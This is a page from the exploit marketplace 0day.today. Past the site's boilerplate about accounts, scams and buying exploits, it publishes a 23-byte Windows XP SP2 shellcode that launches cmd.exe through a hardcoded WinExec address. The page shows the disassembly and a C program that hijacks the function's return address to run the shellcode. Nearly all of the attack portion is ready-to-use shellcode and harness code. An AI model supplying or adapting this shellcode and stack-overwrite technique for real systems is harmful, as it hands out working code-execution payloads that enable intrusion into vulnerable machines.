0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
win32/xp sp2 (En + Ar) cmd.exe 23 bytes
======================================= win32/xp sp2 (En + Ar) cmd.exe 23 bytes ======================================= /* win32/xp sp2 (En + Ar) cmd.exe 23 bytes Author : AnTi SeCuRe TeaM : SauDi ViRuS TeaM Email : AnTi-SeCuRe@HoTMaiL.CoM Site : WwW.VxX9.Cc Thx To : Stack , SauDi ViRuS TeaM ( RENO - Dr.php - ! BaD BoY ! - Jetli007 - Gov.hacker ) Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 English and arabic . get the following if we disassemle this code compiled with olly debugger 00402000 > 8BEC MOV EBP,ESP 00402002 . 68 65786520 PUSH 20657865 00402007 . 68 636D642E PUSH 2E646D63 0040200C . 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 0040200F . 50 PUSH EAX 00402010 . B8 8D15867C MOV EAX,kernel32.WinExec 00402015 . FFD0 CALL EAX */ #include <stdio.h> unsigned char shellcode[] = "\x8b\xec\x68\x65\x78\x65" "\x20\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8\x8D" "\x15\x86\x7C\xff\xd0"; int main () { int *ret; ret=(int *)&ret+2; printf("Shellcode Length is : %d\n",strlen(shellcode)); (*ret)=(int)shellcode; return 0; } # 0day.today [2024-12-25] #